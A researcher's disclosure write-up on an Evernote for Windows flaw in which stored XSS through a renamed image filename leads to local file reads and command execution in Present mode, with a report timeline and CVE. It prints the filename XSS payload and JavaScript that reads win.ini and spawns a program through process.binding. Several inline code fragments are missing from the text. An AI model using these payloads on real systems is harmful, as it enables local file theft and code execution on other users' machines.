Evernote For Windows Read Local File and Command Execute Vulnerabilities

( Original text by TongQing Zhu@Knownsec 404 Team )

0x00 TL;DR

  1. A stored cross site scripting(XSS) issue was repaired before version 6.15.
  2. If a stored XSS in your note,the javascript code will executed in lastest Evernote for Windows.It mean I can create a stored XSS in version 6.14 and it will always work.
  3. Present

     mode was created by 

    node webkit

    ,I can control it by stored XSS.

  4. I successfully read «C:\Windows\win.ini» and open 

     at last.

0x01 A Stored XSS In Version 6.14

Thanks @sebao,He told me how he found a stored xss in Evernote. 1. Add a picture to your note. 2. Right click and rename this picture,like: 

" onclick="alert(1)">.jpg

 3. open this note and click this picture,it will 


2018/09/20, Evernote for Windows 6.15 GA released and fix the issue @sebao reported.

In Evernote for Windows 6.15, 






 were filtered when insert filename,But the note which named by 


 can also 


.It mean they are do nothing when the filename output.I can use store XSS again.

0x02 JS Inject In NodeWebKit

Of course, I don’t think this is a serious security problem.So I decided to find other Vulnerabilities like RCE or local file read.

In version 6.14,I rename this picture as 

" onclick="alert(1)"><script src="">.jpg

 for convenience, It allows me load the js file from remote server. Then I installed Evernote for Windows 6.15.

I try some special api,like: 




,but failed.

After failing many times,I decided to browse all files under path 

C:\\Program Files(x86)\Evernote\Evernote\

.I find Evernote has a 



C:\\Program Files(x86)\Evernote\Evernote\NodeWebKit


Present mode

 will use it.

Another good news is we can execute Nodejs code by stored XSS under 

Present mode


0x03 Read Local File & Command Execute

I try to use 


,but fail: 

Module name "child_process" has not been loaded yet for context

.So I need a new way.

Very Lucky,I found this article: How we exploited a remote code execution vulnerability in math.js

I read local file successfully.

//read local file javascript code
alert("Try to read C:\\\\Windows\\win.ini");
  var buffer = new Buffer(8192);
  process.binding('fs').read(process.binding('fs').open('..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini', 0, 0600), buffer, 0, 4096);

But in NodeWebKit environment,It don’t have 




(I don’t know why).So I try to use 


(I get 





// command executed
  spawn_sync = process.binding('spawn_sync');
  envPairs = [];
  for (var key in window.process.env) {
    envPairs.push(key + '=' + window.process.env[key]);
  args = [];

  const options = {
    file: 'C:\\\\Windows\\system32\\calc.exe',
    args: args,
    envPairs: envPairs,
    stdio: [
      { type: 'pipe', readable: true, writable: false },
      { type: 'pipe', readable: false, writable: true },
      { type: 'pipe', readable: false, writable: true }

0x04 Use Share Function

Now,I can read my computer’s file and execute 


.I need to prove that this vulnerability can affect other people. I signed up for a new account 


 and shared this note with the new account.


 can receive some message in 

Work Chat




 decide to open it and use the 

Present mode

,the Nodejs code will executed.

0x05 Report Timeline

2018/09/27: Find Read Local File and Command Execute Vulnerabilities and reported to security@evernote.com
2018/09/27: Evernote Confirm vulnerabilities
2018/10/15: Evernote fix the vulnerabilities in Evernote For Windows 6.16.1 beta and add my name to Hall of Fame
2018/10/19: request CVE ID:CVE-2018-18524
2018/11/05: After Evernote For Windows 6.16.4 released, Public disclosure


РубрикиБез рубрики

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

%d такие блоггеры, как: